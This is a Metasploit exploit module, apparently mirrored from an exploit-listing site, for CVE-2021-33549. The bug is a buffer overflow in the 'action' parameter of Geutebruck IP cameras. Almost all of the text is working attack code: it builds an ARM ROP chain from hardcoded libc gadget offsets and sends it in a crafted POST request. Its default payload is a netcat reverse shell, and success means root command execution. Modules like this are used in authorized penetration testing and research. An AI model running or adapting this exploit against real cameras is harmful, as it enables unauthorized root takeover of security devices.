Share
## https://sploitus.com/exploit?id=PACKETSTORM:164191
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::CmdStager  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Geutebruck instantrec Remote Command Execution',  
'Description' => %q{  
This module exploits a buffer overflow within the 'action'  
parameter of the /uapi-cgi/instantrec.cgi page of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx,  
ETHC-22xx, and EWPC-22xx devices running firmware versions == 1.12.0.27 as well as firmware  
versions 1.12.13.2 and 1.12.14.5.  
Successful exploitation results in remote code execution as the root user.  
},  
  
'Author' => [  
'Titouan Lazard - RandoriSec', # Discovery  
'Ibrahim Ayadhi - RandoriSec' # Metasploit Module  
],  
'License' => MSF_LICENSE,  
'References' => [  
['CVE', '2021-33549'],  
['URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],  
['URL', 'http://geutebruck.com'],  
['URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']  
],  
'DisclosureDate' => '2021-07-08',  
'Privileged' => true,  
'Platform' => %w[unix linux],  
'Arch' => [ARCH_ARMLE],  
'Targets' => [  
['Automatic Target', {}]  
],  
'DefaultTarget' => 0,  
'DefaultOptions' => {  
'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'  
},  
'Notes' => {  
'Stability' => ['CRASH_SAFE'],  
'Reliability' => ['REPEATABLE_SESSION'],  
'SideEffects' => ['ARTIFACTS_ON_DISK']  
}  
)  
)  
  
register_options(  
[  
OptString.new('TARGETURI', [true, 'The path to the instantrec page', '/uapi-cgi/instantrec.cgi'])  
]  
)  
end  
  
def write_payload  
# gadgets  
libc_add = 0x402da000  
system_off = 0x00357fc  
libc_data_off = 0x12c960  
str_r1_off = 0x0006781c # str r0 into r4 + 0x14; pop r4 pc;  
pop_r0_off = 0x00101de4 # pop r0 pc  
pop_r1_off = 0x0010252c # pop r1 pc  
pop_r4_off = 0x00015164 # pop r4 pc  
system_ = libc_add + system_off  
str_r1 = libc_add + str_r1_off  
pop_r0 = libc_add + pop_r0_off  
pop_r1 = libc_add + pop_r1_off  
pop_r4 = libc_add + pop_r4_off  
add_str = libc_data_off + libc_add + 4  
chunks = (payload.raw + ' ' * (4 - payload.raw.length % 4)).unpack('I<*')  
rop = []  
rop += [pop_r4]  
rop += [add_str - 0x14]  
chunks.each_with_index do |chunk, index|  
rop += [pop_r1]  
rop += [chunk]  
rop += [str_r1]  
rop += if index != (chunks.length - 1)  
[add_str - 0x14 + ((index + 1) * 4)]  
else  
[0x41414141]  
end  
end  
rop += [pop_r0]  
rop += [add_str]  
rop += [system_]  
rop.pack('V*')  
end  
  
def exploit  
print_status("#{rhost}:#{rport} - Attempting to exploit...")  
pad_size = 536  
data = Rex::Text.pattern_create(pad_size) + write_payload  
send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri('/', Rex::Text.rand_hostname, '../', target_uri.path),  
'vars_post' => {  
'action' => data  
}  
)  
handler  
end  
end